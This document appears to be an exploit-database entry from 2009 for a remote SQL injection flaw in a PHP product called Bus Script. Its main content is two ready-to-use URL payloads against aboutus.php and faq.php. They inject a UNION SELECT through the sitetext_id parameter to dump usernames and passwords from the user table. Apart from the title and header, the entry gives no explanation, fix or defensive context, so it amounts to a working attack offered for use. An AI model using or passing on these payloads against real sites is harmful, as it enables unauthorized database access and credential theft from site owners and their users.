id: 5752
date: 09/09/2009
title: Bus Script (sitetext_id) Remote SQL Injection Vulnerability
author: Mr.SQL
cves: 

===========================================================
Bus Script (sitetext_id) Remote SQL Injection Vulnerability
===========================================================


###############################################################
###############################################################
##
## Remote SQL Injection Vulnerability ( aboutus.php sitetext_id )
##
## Bus Script
##
## http://www.tourismscripts.com/
##
########################
########################
##
## -[[: ExploiteS :]]-
##
## www.TraGeT.CoM/aboutus.php?sitetext_id=-1'+UNION+SELECT+0,CONCAT_WS(0x3a3a,user_name,password),0+FROM+user/*
## www.TraGeT.CoM/faq.php?sitetext_id=-1'+UNION+SELECT+0,CONCAT_WS(0x3a3a,user_name,password),0+FROM+user/*
##
########################
########################
 


#  0day.today [2023-03-25]  #